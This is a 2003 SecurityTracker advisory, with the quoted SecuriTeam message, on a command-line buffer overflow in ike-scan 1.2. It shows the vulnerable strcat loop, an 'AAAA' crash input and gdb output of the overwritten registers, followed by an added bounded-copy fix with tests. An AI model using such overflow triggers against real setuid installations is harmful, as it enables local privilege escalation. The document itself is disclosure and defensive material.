SecurityTracker.com
SecurityTracker
Archives
Category:  Application (Security)  >  ike-scan
Vendors:  NTA Monitor Ltd.
'ike-scan' Buffer Overflow May Allow Local Users to Gain Elevated Privileges in Non-Default Configurations
SecurityTracker Alert ID:  1007052
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jun 24 2003
Impact:  Execution of arbitrary code via local system, Root access via local system
Version(s): 1.2
Description:  A buffer overflow vulnerability was reported in 'ike-scan'. A local user can execute arbitrary code. On some systems with a non-default configuration, this may yield root privileges to the local user.

SecuriTeam reported that a buffer overflow resides in the 'ike-scan.c' file in the processing of user-supplied arguments. A local user can trigger the overflow to potentially execute arbitrary code. A demonstration exploit transcript is provided:

/usr/local/bin/ike-scan
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

ike-scan is not installed with set user id (setuid) privileges, but previous reports have noted that some administrators may have configured the application with setuid root user privileges to accommodate lower privileged users, as ike-scan requires root privileges to be fully effective. In this case, a local user can gain root privileges on the system.

The report credits jsk.

Impact:  A remote user can execute arbitrary code with the privileges of ike-scan. This may be an issue on systems where administrators have configured ike-scan with setuid root privileges (which is not the default setting).
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.nta-monitor.com/ike-scan/
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  SecuriTeam <support@securiteam.com>
Message History:   None.


Source Message Contents

Date:  24 Jun 2003 16:15:53 +0200
From:  SecuriTeam <support@securiteam.com>
Subject:  [UNIX] ike-scan Buffer Overflow Vulnerabilities

 

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

- - promotion
Beyond Security in Canada
Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada. We welcome ISPs, system integrators and IT systems resellers to promote the most advanced vulnerability assessment solutions today. Contact us at 416-482-0038 or at canadasales@beyondsecurity.com
- - - - - - - - -

ike-scan Buffer Overflow Vulnerabilities
------------------------------------------------------------------------

SUMMARY

<http://www.nta-monitor.com/ike-scan/> ike-scan, a VPN Discovery and Fingerprinting tool, has been found to contain a buffer overflow vulnerability.

DETAILS

Vulnerable code:
Vulnerable code can be found in ike-scan.c:295

........................
for (arg=0; arg<argc; arg++) {
   strcat(arg_str, argv[arg]);
   if (arg < (argc-1)) {
      strcat(arg_str, " ");
.....................................

Example:
sh-2.05b# /usr/local/bin/ike-scan AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

sh-2.05b# gdb /usr/local/bin/ike-scan
GNU gdb Red Hat Linux (5.2.1-4)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
/tmp/ike-scan-1.0/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
xxxxxxxxxxx: File name too long.
(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /usr/local/bin/ike-scan AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x08048da2 in main (argc=1094795585, argv=0x41414141) at ike-scan.c:295
295         strcat(arg_str, argv[arg]);
(gdb) bt
#0  0x08048da2 in main (argc=1094795585, argv=0x41414141) at ike-scan.c:295
#1  0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) x/i $eip
0x8048da2 <main+126>:   pushl (%eax,%ebx,4)
(gdb) x/i $eax
0x41414141:     Cannot access memory at address 0x41414141
(gdb) x/i 0x08048da2
0x8048da2 <main+126>:   pushl (%eax,%ebx,4)
(gdb)

point: argv=0x41414141, problem in *argv()

ADDITIONAL INFORMATION

The information has been provided by <mailto:jsk@ph4nt0m.net> jsk.
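The loop quoted in the advisory (and described in the entry above) appends every argv element to a fixed buffer with strcat() and never checks how much room is left. As an added example, not ike-scan's or SecuriTeam's code, here is a bounded join that refuses oversized input, exercised with constructed inputs; the buffer size ARG_STR_SIZE and the function names are assumptions for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed fixed buffer standing in for ike-scan's arg_str (size is an assumption). */
#define ARG_STR_SIZE 64

/* Bounded replacement for the advisory's strcat() loop: tracks bytes used and
 * refuses arguments that do not fit instead of writing past the end of dst.
 * Returns 0 on success, -1 on overflow (dst is left empty). */
static int join_args_safe(char *dst, size_t dst_size, int argc, char **argv) {
    size_t used = 0;
    if (dst_size == 0) return -1;
    dst[0] = '\0';
    for (int arg = 0; arg < argc; arg++) {
        size_t len = strlen(argv[arg]);
        size_t sep = (arg < argc - 1) ? 1 : 0;   /* space between arguments */
        /* room needed: argument + optional separator + NUL terminator */
        if (len + sep + 1 > dst_size - used) {
            dst[0] = '\0';
            return -1;
        }
        memcpy(dst + used, argv[arg], len);
        used += len;
        if (sep) dst[used++] = ' ';
        dst[used] = '\0';
    }
    return 0;
}

/* Constructed input: an ordinary command line that fits the buffer. */
int demo_normal_args_fit(void) {
    char buf[ARG_STR_SIZE];
    char *argv[] = {"ike-scan", "-M", "192.0.2.1"};
    return join_args_safe(buf, sizeof buf, 3, argv) == 0 &&
           strcmp(buf, "ike-scan -M 192.0.2.1") == 0;
}

/* Constructed input: one oversized 'AAAA...' argument, as in the advisory; the
 * unbounded original would overflow here, the bounded join rejects it. */
int demo_long_arg_rejected(void) {
    char buf[ARG_STR_SIZE], big[4 * ARG_STR_SIZE];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    char *argv[] = {"ike-scan", big};
    return join_args_safe(buf, sizeof buf, 2, argv) == -1 && buf[0] == '\0';
}

int main(void) {
    printf("fits=%d rejected=%d\n", demo_normal_args_fit(), demo_long_arg_rejected());
    return 0;
}
```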



Copyright 2002, SecurityGlobal.net LLC